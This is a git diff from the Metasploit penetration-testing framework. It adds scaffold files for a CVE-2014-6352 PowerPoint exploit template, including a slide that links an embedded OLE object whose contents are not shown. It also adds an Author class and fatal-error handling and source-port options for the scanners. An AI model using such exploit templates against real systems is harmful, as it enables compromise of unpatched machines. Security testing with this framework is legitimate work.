3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1435100"/><a:ext cx="3008313" cy="4691063"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="picTx" preserve="1"><p:cSld name="Picture with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="4800600"/><a:ext cx="5486400" cy="566738"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Picture Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="pic" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="612775"/><a:ext cx="5486400" cy="4114800"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="5367338"/><a:ext cx="5486400" cy="804862"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml Executable file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml Executable file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml Executable file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:viewPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:normalViewPr><p:restoredLeft sz="15620"/><p:restoredTop sz="94660"/></p:normalViewPr><p:slideViewPr><p:cSldViewPr><p:cViewPr varScale="1"><p:scale><a:sx n="57" d="100"/><a:sy n="57" d="100"/></p:scale><p:origin x="-1242" y="-522"/></p:cViewPr><p:guideLst><p:guide orient="horz" pos="2160"/><p:guide pos="2880"/></p:guideLst></p:cSldViewPr></p:slideViewPr><p:notesTextViewPr><p:cViewPr><p:scale><a:sx n="100" d="100"/><a:sy n="100" d="100"/></p:scale><p:origin x="0" y="0"/></p:cViewPr></p:notesTextViewPr><p:gridSpacing cx="76200" cy="76200"/></p:viewPr>

41
data/logos/metasploit-trail.txt Normal file
View File

@ -0,0 +1,41 @@
%clr
%mag .~+P``````-o+:. -o+:.%clr
%mag.+oooyysyyssyyssyddh++os-````` ``````````````` `%clr
%mag+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o%clr
%mag++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy%clr
%mag--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///%clr
%mag `...............` `...-/////...`%clr
%clr
%clr
%whi .::::::::::-. .::::::-%clr
%whi .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo%clr
%whi :Nm-/NMMMMMMMMMMMMM%blu$$%whiNMMMMm%blu&&%whiMMMMMMMMMMMMMMy%clr
%whi .sm/`-yMMMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMMMh`%clr
%whi -Nd` :MMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMMh`%clr
%whi -Nh` .yMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMm/%clr
%whi `oo/``-hd: `` .sNd :MMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMm/%clr
%whi .yNmMMh%dred//%whi+syysso-`````` -mh` :MMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMd%clr
%whi .shMMMMN%dred//%whidmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/%clr
%whi `///omh%dred//%whidMMMMMMMMMMMMMMMN/%dred:::::/+ooso--/ydh//+s+/ossssso:--syN///os:%clr
%whi /MMMMMMMMMMMMMMMMMMd. %dred`/++-.-yy/%whi...%dredosydh/-+oo:-`o//%whi...%dredoyodh+%clr
%whi -hMMmssddd+:dMMmNMMh. %dred`.-=mmk.%whi//^^^\\%dred.^^`:++:^^o:%whi//^^^\\%dred`::%clr
%whi .sMMmo. -dMd--:mN/` %whi||--X--||%clr %dred%whi||--X--||%clr
%whi........../yddy/:...+hmo-...hdd:............%whi\\=v=//%clr............%dred%whi\\=v=//%clr.........
%grn================================================================================%clr
%grn=====================%whi+--------------------------------+%grn=========================%clr
%grn=====================%whi| Session one died of dysentery. |%grn=========================%clr
%grn=====================%whi+--------------------------------+%grn=========================%clr
%grn================================================================================%clr
%clr
%clr %grnPress ENTER to size up the situation%clr
%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%clr
%clr %whiPress SPACE BAR to continue%clr
%clr

2
lib/metasploit/framework/login_scanner/ftp.rb
View File

@ -41,7 +41,7 @@ module Metasploit
begin
success = connect_login(credential.public, credential.private)
rescue ::EOFError, Errno::ECONNRESET, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
success = false
end

2
lib/metasploit/framework/login_scanner/telnet.rb
View File

@ -92,7 +92,7 @@ module Metasploit
end
end
rescue ::EOFError, Errno::ECONNRESET, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
end

12
lib/msf/base/serializer/readable_text.rb
View File

@ -20,17 +20,17 @@ class ReadableText
# @return [String] formatted text output of the dump.
def self.dump_module(mod, indent = " ")
case mod.type
when MODULE_PAYLOAD
when Msf::MODULE_PAYLOAD
return dump_payload_module(mod, indent)
when MODULE_NOP
when Msf::MODULE_NOP
return dump_basic_module(mod, indent)
when MODULE_ENCODER
when Msf::MODULE_ENCODER
return dump_basic_module(mod, indent)
when MODULE_EXPLOIT
when Msf::MODULE_EXPLOIT
return dump_exploit_module(mod, indent)
when MODULE_AUX
when Msf::MODULE_AUX
return dump_auxiliary_module(mod, indent)
when MODULE_POST
when Msf::MODULE_POST
return dump_post_module(mod, indent)
else
return dump_generic_module(mod, indent)

12
lib/msf/base/simple/framework.rb
View File

@ -54,12 +54,12 @@ module Framework
ModuleSimplifiers =
{
MODULE_ENCODER => Msf::Simple::Encoder,
MODULE_EXPLOIT => Msf::Simple::Exploit,
MODULE_NOP => Msf::Simple::Nop,
MODULE_PAYLOAD => Msf::Simple::Payload,
MODULE_AUX => Msf::Simple::Auxiliary,
MODULE_POST => Msf::Simple::Post,
Msf::MODULE_ENCODER => Msf::Simple::Encoder,
Msf::MODULE_EXPLOIT => Msf::Simple::Exploit,
Msf::MODULE_NOP => Msf::Simple::Nop,
Msf::MODULE_PAYLOAD => Msf::Simple::Payload,
Msf::MODULE_AUX => Msf::Simple::Auxiliary,
Msf::MODULE_POST => Msf::Simple::Post,
}
#

10
lib/msf/core.rb
View File

@ -18,6 +18,16 @@ require 'rex'
require 'rex/ui'
module Msf
autoload :Author, 'msf/core/author'
autoload :Platform, 'msf/core/platform'
autoload :Reference, 'msf/core/reference'
autoload :SiteReference, 'msf/core/site_reference'
autoload :Target, 'msf/core/target'
#
# Constants
#
LogSource = "core"
end

149
lib/msf/core/author.rb Normal file
View File

@ -0,0 +1,149 @@
# -*- coding: binary -*-
require 'msf/core'
###
#
# This data type represents an author of a piece of code in either
# the framework, a module, a script, or something entirely unrelated.
#
###
class Msf::Author
# A hash of known author names
Known =
{
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'anonymous' => 'Unknown',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'Christian Mehlmauer' => 'FireFart' + 0x40.chr + 'gmail.com',
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'joev' => 'joev' + 0x40.chr + 'metasploit.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'Ben Campbell' => 'eat_meatballs' + 0x40.chr + 'hotmail.co.uk',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'wvu' => 'wvu' + 0x40.chr + 'metasploit.com'
}
#
# Class method that translates a string to an instance of the Author class,
# if it's of the right format, and returns the Author class instance
#
def self.from_s(str)
instance = self.new
# If the serialization fails...
if (instance.from_s(str) == false)
return nil
end
return instance
end
#
# Transforms the supplied source into an array of authors
#
def self.transform(src)
Rex::Transformer.transform(src, Array, [ self ], 'Author')
end
def initialize(name = nil, email = nil)
self.name = name
self.email = email || Known[name]
end
#
# Compares authors
#
def ==(tgt)
return (tgt.to_s == to_s)
end
#
# Serialize the author object to a string in form:
#
# name <email>
#
def to_s
str = "#{name}"
if (email and not email.empty?)
str += " <#{email}>"
end
return str
end
#
# Translate the author from the supplied string which may
# have either just a name or also an email address
#
def from_s(str)
# Supported formats:
# known_name
# user [at/@] host [dot/.] tld
# Name <user [at/@] host [dot/.] tld>
if ((m = str.match(/^\s*([^<]+)<([^>]+)>\s*$/)))
self.name = m[1].sub(/<.*/, '')
self.email = m[2].sub(/\s*\[at\]\s*/, '@').sub(/\s*\[dot\]\s*/, '.')
else
if (Known[str])
self.email = Known[str]
self.name = str
else
self.email = str.sub(/\s*\[at\]\s*/, '@').sub(/\s*\[dot\]\s*/, '.').gsub(/^<|>$/, '')
m = self.email.match(/([^@]+)@/)
self.name = m ? m[1] : nil
if !(self.email and self.email.index('@'))
self.name = self.email
self.email = ''
end
end
end
self.name.strip! if self.name
return true
end
#
# Sets the name of the author and updates the email if it's a known author.
#
def name=(name)
self.email = Known[name] if (Known[name])
@name = name
end
attr_accessor :email
attr_reader :name
end

4
lib/msf/core/auxiliary.rb
View File

@ -21,14 +21,14 @@ class Auxiliary < Msf::Module
# Returns MODULE_AUX to indicate that this is an auxiliary module.
#
def self.type
MODULE_AUX
Msf::MODULE_AUX
end
#
# Returns MODULE_AUX to indicate that this is an auxiliary module.
#
def type
MODULE_AUX
Msf::MODULE_AUX
end
#

2
lib/msf/core/auxiliary/rservices.rb
View File

@ -35,7 +35,7 @@ module Auxiliary::RServices
begin
sd = connect(true, { 'CPORT' => cport })
rescue Rex::AddressInUse
rescue Rex::BindFailed
# Ignore and try again
#vprint_error("Unable to connect: #{$!}")

67
lib/msf/core/auxiliary/scanner.rb
View File

@ -57,11 +57,18 @@ def run
threads_max = datastore['THREADS'].to_i
@tl = []
@scan_errors = []
#
# Sanity check threading on different platforms
# Sanity check threading given different conditions
#
if datastore['CPORT'].to_i != 0 && threads_max > 1
print_error("Warning: A maximum of one thread is possible when a source port is set (CPORT)")
print_error("Thread count has been adjusted to 1")
threads_max = 1
end
if(Rex::Compat.is_windows)
if(threads_max > 16)
print_error("Warning: The Windows platform cannot reliably support more than 16 threads")
@ -81,17 +88,22 @@ def run
begin
if (self.respond_to?('run_range'))
# No automated progress reporting for run_range
# No automated progress reporting or error handling for run_range
return run_range(datastore['RHOSTS'])
end
if (self.respond_to?('run_host'))
@tl = []
loop do
# Stop scanning if we hit a fatal error
break if has_fatal_errors?
# Spawn threads for each host
while (@tl.length < threads_max)
# Stop scanning if we hit a fatal error
break if has_fatal_errors?
ip = ar.next_ip
break if not ip
@ -102,6 +114,10 @@ def run
begin
nmod.run_host(targ)
rescue ::Rex::BindFailed
if datastore['CHOST']
@scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable"
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError
rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError
raise $!
@ -114,6 +130,9 @@ def run
end
end
# Stop scanning if we hit a fatal error
break if has_fatal_errors?
# Exit once we run out of hosts
if(@tl.length == 0)
break
@ -133,6 +152,7 @@ def run
scanner_show_progress() if @show_progress
end
scanner_handle_fatal_errors
return
end
@ -147,10 +167,12 @@ def run
ar = Rex::Socket::RangeWalker.new(datastore['RHOSTS'])
@tl = []
while(true)
nohosts = false
# Stop scanning if we hit a fatal error
break if has_fatal_errors?
while (@tl.length < threads_max)
batch = []
@ -172,6 +194,10 @@ def run
mybatch = bat.dup
begin
nmod.run_batch(mybatch)
rescue ::Rex::BindFailed
if datastore['CHOST']
@scan_errors << "The source IP (CHOST) value of #{datastore['CHOST']} was not usable"
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error
rescue ::Interrupt,::NoMethodError, ::RuntimeError, ::ArgumentError, ::NameError
raise $!
@ -191,6 +217,9 @@ def run
end
end
# Stop scanning if we hit a fatal error
break if has_fatal_errors?
# Exit if there are no more pending threads
if (@tl.length == 0)
break
@ -212,6 +241,7 @@ def run
scanner_show_progress() if @show_progress
end
scanner_handle_fatal_errors
return
end
@ -234,17 +264,38 @@ def seppuko!
end
end
def has_fatal_errors?
@scan_errors && !@scan_errors.empty?
end
def scanner_handle_fatal_errors
return unless has_fatal_errors?
return unless @tl
# First kill any running threads
@tl.each {|t| t.kill if t.alive? }
# Show the unique errors triggered by the scan
uniq_errors = @scan_errors.uniq
uniq_errors.each do |emsg|
print_error("Fatal: #{emsg}")
end
print_error("Scan terminated due to #{uniq_errors.size} fatal error(s)")
end
def scanner_progress
return 0 unless @range_done and @range_count
pct = (@range_done / @range_count.to_f) * 100
end
def scanner_show_progress
# it should already be in the process of shutting down if there are fatal errors
return if has_fatal_errors?
pct = scanner_progress
if(pct >= (@range_percent + @show_percent))
if pct >= (@range_percent + @show_percent)
@range_percent = @range_percent + @show_percent
tdlen = @range_count.to_s.length
print_status("Scanned #{"%.#{tdlen}d" % @range_done} of #{@range_count} hosts (#{"%.3d" % pct.to_i}% complete)")
print_status(sprintf("Scanned %#{tdlen}d of %d hosts (%d%% complete)", @range_done, @range_count, pct))
end
end

34
lib/msf/core/auxiliary/udp_scanner.rb
View File

@ -8,33 +8,36 @@ module Msf
#
###
module Auxiliary::UDPScanner
include Auxiliary::Scanner
# A hash of results of a given batch run, keyed by host
attr_accessor :results
#
# Initializes an instance of an auxiliary module that scans UDP
#
def initialize(info = {})
super
register_options(
[
Opt::CHOST,
Opt::RPORT,
OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),
OptInt.new('THREADS', [true, "The number of concurrent threads", 10])
], self.class)
register_advanced_options(
[
Opt::CHOST,
Opt::CPORT,
OptInt.new('ScannerRecvInterval', [true, 'The maximum numbers of sends before entering the processing loop', 30]),
OptInt.new('ScannerMaxResends', [true, 'The maximum times to resend a packet when out of buffers', 10]),
OptInt.new('ScannerRecvQueueLimit', [true, 'The maximum queue size before breaking out of the processing loop', 100]),
OptInt.new('ScannerRecvWindow', [true, 'The number of seconds to wait post-scan to catch leftover replies', 15]),
OptInt.new('ScannerRecvWindow', [true, 'The number of seconds to wait post-scan to catch leftover replies', 15])
], self.class)
end
# Define our batch size
def run_batch_size
datastore['BATCHSIZE'].to_i
@ -44,6 +47,7 @@ module Auxiliary::UDPScanner
def run_batch(batch)
@udp_sock = Rex::Socket::Udp.create({
'LocalHost' => datastore['CHOST'] || nil,
'LocalPort' => datastore['CPORT'] || 0,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(@udp_sock)
@ -155,12 +159,25 @@ module Auxiliary::UDPScanner
queue.length
end
def cport
datastore['CPORT']
end
